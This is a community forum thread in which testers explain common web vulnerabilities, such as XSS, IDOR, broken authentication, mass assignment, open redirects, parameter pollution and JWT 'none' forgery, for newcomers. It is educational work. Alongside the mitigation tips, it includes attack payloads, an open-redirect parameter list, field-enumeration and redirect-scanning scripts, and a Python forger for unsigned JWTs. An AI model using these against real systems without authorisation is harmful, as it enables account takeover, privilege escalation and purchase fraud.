Can you simply explain a web security risk you think testers should know about?

toptal.com lists these as the 10 Common Web Security Vulnerabilities:

  1. Injection Flaws
  2. Broken Authentication
  3. Cross-Site Scripting (XSS)
  4. Insecure Direct Object References (IDOR)
  5. Security Misconfiguration
  6. Sensitive Data Exposure
  7. Missing Function Level Access Control
  8. Cross-Site Request Forgery (CSRF)
  9. Using Components With Known Vulnerabilities
  10. Unvalidated Redirects and Forwards

We would love to create a community-curated collection of glossary entries that:

  • explains what each of these things is,
  • offers a tip or two for testers and teams to reduce the risk,
  • plus anything you’d want someone new to security to know about it.

Simple, practical, and in your words. Can you help?

You don’t need to do them all, just pick one or two that interest you. Or if you think something’s missing, go ahead and do your own thing.

Drop your contribution in reply to this post. Your entry will show on your profile and in the glossary collection, and you’ll earn a community star :star:

8 Likes

Sensitive Data Exposure is a common web security vulnerability where applications expose sensitive information such as passwords, credit card numbers, health records, or personal information due to poor security practices.

Examples:

  • Data sent over HTTP instead of HTTPS.
  • Passwords stored in plain text.
  • Weak or outdated hashing (e.g. MD5 or SHA-1); use bcrypt, scrypt, or Argon2 with a salt instead.
  • Data leakage via verbose error messages, logs, or browser storage.
❌ Insecure: storing plaintext password

user_data = {
    "username": "aiman",
    "password": "mysecretpassword"
}

✅ Secure: hash + salt the password

import bcrypt, hashlib

password = "mysecretpassword"
salt = bcrypt.gensalt()
# bcrypt works on bytes, so encode the password before hashing
hashed = bcrypt.hashpw(password.encode(), salt)

username = "aiman"
# SHA-256 digest of the username as a hex string
hashed_username = hashlib.sha256(username.encode()).hexdigest()

I already knew about this vulnerability and took the solution from the internet :slight_smile: Thanks.

5 Likes

With inspiration from the CIS18 organizational security practices, I would add an additional item to the list. While similar to #9, it’s about what was already trusted.

Supply chain attack: Your web app will depend on libraries and services outside your control, such as social media trackers, CSS frameworks, or similar plugins. Over time they might become insecure or outdated. Keep a list of them, and keep a last known working version on your end.

Famous examples were Log4j and SolarWinds.
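
A tiny sketch of the "keep a list and a last working version" tip for a Python app; the package names and pinned versions below are only examples:

from importlib.metadata import PackageNotFoundError, version

# your last known good versions, kept in your own repo
KNOWN_GOOD = {"requests": "2.31.0", "flask": "3.0.0"}

for pkg, pinned in KNOWN_GOOD.items():
    try:
        installed = version(pkg)
    except PackageNotFoundError:
        print(f"{pkg}: not installed")
        continue
    if installed != pinned:
        print(f"{pkg}: drifted ({installed} != {pinned})")
    else:
        print(f"{pkg}: OK")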

BTW: The list above seems similar to the OWASP Top 10 analysis of 2021; they have a new analysis coming out later this year.

2 Likes

Thanks @jesper,

@fullsnacktester spotted the same similarity on my Slack post about this, I think.

Thank you for contributing here and on LinkedIn! I’ll be putting this collection together in a few weeks, but I’ll keep an eye out for updates from OWASP. :folded_hands: Brilliant tip, thanks! I hope the collection is something we keep adding to.

2 Likes

@sarahdeery

Cross-Site Scripting (XSS):

In this case, an attacker injects a malicious script into a trusted website. If the site doesn’t sanitize user input, the script executes in users’ browsers, generally to steal cookies or session data.

Tester tip:

Try entering a harmless script such as <script>alert(1)</script> in input fields or URLs. If it actually executes, then the site is vulnerable.

Pro tip:

Always escape and validate all user inputs.
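
For teams, a minimal sketch of that tip using Python’s standard library html module:

import html

user_input = "<script>alert(1)</script>"
safe = html.escape(user_input)
# prints &lt;script&gt;alert(1)&lt;/script&gt;, which renders as text, not code
print(safe)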

Thanks,
Ramanan

1 Like

Broken Authentication means that a web application’s login system or session management is flawed, letting attackers bypass authentication and gain unauthorized access to sensitive accounts—sometimes even administrative ones. Attackers exploit these issues through methods like stolen or weak credentials, brute-force attacks, or hijacking session identifiers. [1][2]

Problem Areas

  • Credential Management: Weak or default passwords, poor password storage (no hashing/salting), or flaws in password recovery make it easier for attackers to steal or guess passwords.
  • Session Management: Vulnerabilities in how sessions are created, tracked, or terminated can lead to session hijacking—where attackers impersonate users by stealing session IDs, often through poorly protected browser cookies or unexpired sessions. [3]

Tips for Testers

  • Test for Common Weaknesses
    • Try default and weak passwords (“password”, “admin”, “123456”, etc.) and check the application’s password policies.
    • Attempt brute-force and credential stuffing attacks (within allowed scope) to verify protections.
  • Check Session Management
    • Confirm that session tokens are not leaked in URLs and are changed after login (see the sketch after this list).
    • Validate session termination: users should be logged out everywhere after logging out or timing out.
  • Explore Forgot-Password and Recovery Flows
    • Test for predictable, non-expiring, or re-usable reset tokens.
    • Check for error messages or flow differences that might leak whether an account exists.
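
A minimal sketch of the "token changes after login" check; the login endpoint, credentials, and cookie name are placeholders:

import requests

BASE = "https://app.example.com"      # hypothetical application under test

s = requests.Session()
s.get(f"{BASE}/login")                # pick up the pre-login session cookie
pre_login = s.cookies.get("session")  # cookie name is an assumption

s.post(f"{BASE}/login", data={"username": "tester", "password": "secret"})
post_login = s.cookies.get("session")

# if the token did not change, the app may be open to session fixation
print("Token rotated after login:", pre_login != post_login)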

What New Security Testers Should Know

Broken authentication is one of the most impactful vulnerabilities, often leading to data breaches or account takeovers—even on major platforms.

Sources (thanks to Perplexity AI for supporting the search [4]):

  1. PortSwigger (home of Burp Suite, a well-known security tool)
  2. Bright Security
  3. OWASP API2:2023 Broken Authentication
  4. Prompt (shown below)

The prompt given to the AI was: On the list of 10 Common Web Security Vulnerabilities you find “Broken Authentication”. Describe it shortly for a tester community:

  • explains what each of these thing is,
  • offers a tip or two for testers and teams to reduce the risk,
  • plus anything you’d want someone new to security to know about it.
2 Likes

This is called an Open Redirect vulnerability.

As for other vulnerabilities known to testers… there are so many to name, literally hundreds of different kinds :smiley:

IDOR, one of the most common vulnerabilities on bug bounty programs, is probably “THE ONE” to know (it’s Nr 4 on your list).

If a URL is https://example.com/profile?user_id=123 and the application doesn’t verify if the user accessing the page is actually user 123, someone could change the user_id to 456 and access that user’s profile and edit it.
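
On the team side, the missing piece is a server-side ownership check. A minimal Flask sketch (route name and data are made up for illustration):

from flask import Flask, abort, jsonify, session

app = Flask(__name__)
app.secret_key = "dev-only"

PROFILES = {123: {"name": "Alice"}, 456: {"name": "Bob"}}  # stand-in data

@app.route("/profile/<int:user_id>")
def profile(user_id):
    # the check vulnerable apps forget: does this resource belong to the caller?
    if session.get("user_id") != user_id:
        abort(403)
    return jsonify(PROFILES.get(user_id, {}))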

2 Likes

Check the URL of the downloaded file.

E.g. it is possible to upload a CV into a job application web site. The user can download the latest version to check for necessary updates.

  • Copy the URL of the downloaded document to a word processor.
  • Use another user id and password to log in.
  • Paste the copied URL in the address text field and press return.
  • If the document is shown, then other users can access personal data.

A more advanced trick is to change the name of the previously uploaded file in the URL.
E.g. replace CV_John_Smith.pdf by CV_Peter_Jones.pdf.
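
The same check can be scripted once you have two test accounts; the URLs, login endpoint, and credentials below are placeholders:

import requests

# document URL captured while logged in as user A
DOC_URL = "https://jobs.example.com/documents/CV_John_Smith.pdf"

# log in as user B (hypothetical login endpoint) and request user A's document
s = requests.Session()
s.post("https://jobs.example.com/login", data={"user": "userB", "password": "..."})
r = s.get(DOC_URL)

# anything other than 403/404 suggests other users can reach personal data
print(r.status_code)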

2 Likes

That’s classified as an IDOR :stuck_out_tongue:

2 Likes

Thanks for the brill input on this thread, along with insights shared in the MoT Slack and on LinkedIn. We’ve pulled together 17 clear, practical explanations of critical security risks, each with examples and top tips.

Big thanks to Hanisha Arora, Jesper Ottosen, Richard Adams, Emily O’Connor, Lewis Prescott, Kristof Van Kriekingen, Adam Davis, Aiman B T Syed, Ramanan Prabakaran, Han Lim, and Joerg for sharing their wisdom :folded_hands:

You can explore the collection here :backhand_index_pointing_right: https://www.ministryoftesting.com/collections/common-security-risks-explained-by-the-motaverse

4 Likes

Great efforts and valuable collection! :clap:

1 Like

Another fun one is “Mass Assignment Vulnerability”

It happens when an application automatically maps user-provided data (e.g. from an HTTP request) into internal objects or models without controlling which fields can be set. If the developer doesn’t explicitly whitelist allowed fields, attackers can supply extra parameters to modify sensitive attributes they shouldn’t be able to touch, like admin flags, account balances, discounts, etc. (as long as they map to fields in the internal model).
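
The usual defence is a whitelist on the server. A minimal, framework-agnostic sketch (field names are illustrative):

ALLOWED_FIELDS = {"name", "email"}  # the only fields a client may set

def update_profile(user, request_body: dict):
    # copy only whitelisted keys; "isAdmin", "role", etc. are silently dropped
    for key in ALLOWED_FIELDS & request_body.keys():
        setattr(user, key, request_body[key])
    return user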

Example 1: You are updating your own user profile and you see this in the swagger & network tab:

{
"name": "Kristof",
"email": "kristof@example.com"
}

What you could then do is change the request body to this:

{
"name": "Kristof",
"email": "kristof@example.com",
"isAdmin": true
}

The field is highly unlikely to actually be called “isAdmin”. That’s why it’s often enumerated and tested with scripting, since it could be role, roles, admin, … anything really. BUT when whitebox testing, you know the field name from the code. Also, the value might not be “true”; it might be a number or the name of a specific role.

So it could also be:

{
"name": "Kristof",
"email": "kristof@example.com",
"tenantRole": "Admin"
}

That’s the beauty of blackbox pentesting: you’ll have to try a lot blindly.

A tip: often the API responses will show the correct name of the field, which can already help you.

So if you were to do a GET Profile request of yourself it might say this:

{
"name": "Kristof",
"email": "kristof@example.com",
"RoleId": 2
}

And then you can easily try all the different values to see if it gets updated or not.
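
A minimal sketch of scripting that enumeration with Python requests; the endpoint, token, and candidate field names are assumptions, not from a real API:

import requests

URL = "https://app.example.com/api/profile"          # hypothetical endpoint
HEADERS = {"Authorization": "Bearer <your-token>"}   # hypothetical auth
BASE = {"name": "Kristof", "email": "kristof@example.com"}

CANDIDATES = {"isAdmin": True, "admin": True, "role": "Admin", "RoleId": 2}

for field, value in CANDIDATES.items():
    body = {**BASE, field: value}
    r = requests.put(URL, json=body, headers=HEADERS)
    # check the response (or a follow-up GET) to see if the field was accepted
    print(field, r.status_code, r.text[:80])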


People often think mass assignment is only about access management, but you can totally do this in a webshop too, for example to give yourself discounts.

{
"orderId": 12345,
"address": "123 Main Street",
"phone": "555-1234",
"item": "X-Box"
}

And add in something like:

{
"orderId": 12345,
"address": "123 Main Street",
"phone": "555-1234",
"item": "X-Box",
"discount": 0.9
}

2 Likes

There is also “Open Redirects”

With an open redirect vulnerability, the idea is to get the user to redirect to a malicious website.

An example would be:

https://example.com/redirect?url=evilwebsite.com

In pentesting, we don’t use actual evil websites, only our own hosted sites, in order to chain this vulnerability with something else.

So it’s one thing to create a URL with an open redirect in it, and it’s another thing to permanently store it inside the application. It can be used in phishing campaigns, as people will see the real domain of the client and not the appended redirect target.

By itself it’s a lesser vulnerability and that’s why it’s often required to chain it to something else.

There are a LOT of parameters you can try that might be supported in your application; some examples from PayloadsAllTheThings:

?checkout_url={payload}
?continue={payload}
?dest={payload}
?destination={payload}
?go={payload}
?image_url={payload}
?next={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
?return_path={payload}
?return_to={payload}
?return={payload}
?returnTo={payload}
?rurl={payload}
?target={payload}
?url={payload}
?view={payload}
/{payload}
/redirect/{payload}

This list can be used to create a script that tries them all, as sketched below.
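
A minimal sketch of such a script; the target URL and redirect host are placeholders, and it should only run against something you are allowed to test:

import requests

TARGET = "https://example.com/"                  # application under test
PAYLOAD = "https://your-own-test-host.example"   # your own hosted site
PARAMS = ["next", "url", "redirect", "redirect_url", "return_to", "dest"]

for p in PARAMS:
    r = requests.get(TARGET, params={p: PAYLOAD}, allow_redirects=False)
    location = r.headers.get("Location", "")
    if PAYLOAD in location:
        print(f"possible open redirect via ?{p}= -> {location}")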

A cool one that always works due to browser behaviour (but is also super obvious) is @ after the URL. For example: https://www.ministryoftesting.com@google.com/

Extra payload list: PayloadsAllTheThings/Open Redirect at master · swisskyrepo/PayloadsAllTheThings · GitHub



2 Likes

Parameter Pollution

“HTTP Parameter Pollution” happens when an attacker sends multiple parameters with the same name in a single HTTP request, which is easily tested by every tester, I might add!

For example, there is a webshop and you are purchasing the following via its API:

https://shop.example.com/cart?productId=123&quantity=1

We can see the productId and the quantity.

  • productId=123
  • quantity=1

These are the parameters, and in this example we’ll try to pollute quantity, so we add another parameter with the same name but a different value.

/cart?productId=123&quantity=1&quantity=999

and basically hope that we receive 999 items while only paying for one :slight_smile:

This can be done with any parameter if not validated on the backend.

/getProfile?userId=1&userId=2

Which might return data of other users that you are not allowed to see!
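
A minimal sketch of sending duplicate parameters with Python requests (the cart endpoint is the hypothetical one from above; what matters is observing how the backend resolves the duplicates):

import requests

url = "https://shop.example.com/cart"
# a list of tuples keeps both quantity values in the query string
params = [("productId", "123"), ("quantity", "1"), ("quantity", "999")]

r = requests.get(url, params=params)
print(r.url)          # .../cart?productId=123&quantity=1&quantity=999
print(r.status_code, r.text[:100])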

1 Like

JWT Hacking with the “none” algorithm

The JWT “none” algorithm vulnerability is like accepting an important contract just because the first page says “no signature needed.” Normally, a JWT is like a digital ID card that’s signed so the server can verify it hasn’t been tampered with. The “header” section of the JWT tells the server which signature method to use. In this vulnerability, an attacker changes the header to say “alg”: “none”, meaning “don’t check the signature”, and then edits the contents to give themselves higher privileges.

A JWT often looks like this:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30

It’s separated by dots into 3 parts: header.payload.signature

When you decode the JWT on, for example, https://www.jwt.io/, you can read the values of the token, and the header will say:

{
"alg": "HS256",
"typ": "JWT"
}

It’s usually signed with a secret or private key so the receiver can verify the data hasn’t been changed. The signature is the 3rd part of the JWT, and the header above states which algorithm was used, in this example HS256.

You can edit these values and regenerate a JWT token and that’s what we’ll do. We’ll change the alg to “none” and remove the signature completely, meaning there is no signature required.

{
"alg": "none",
"typ": "JWT"
}

Optionally, you can then also edit the values in the payload, like:

{
"sub": "1234567890",
"name": "Kristof",
"admin": true
}
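
If you want to forge such a token by hand, here is a minimal sketch using only the Python standard library; whether the server accepts it is exactly what you are testing:

import base64, json

def b64url(data: dict) -> str:
    # base64url-encode a JSON object without padding, as JWTs expect
    raw = json.dumps(data, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

header = {"alg": "none", "typ": "JWT"}
payload = {"sub": "1234567890", "name": "Kristof", "admin": True}

forged = f"{b64url(header)}.{b64url(payload)}."   # empty signature segment
print(forged)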

If you wish to try it out yourself: Attacking JWT authentication

Fun fact: JWT is actually pronounced “jot”

1 Like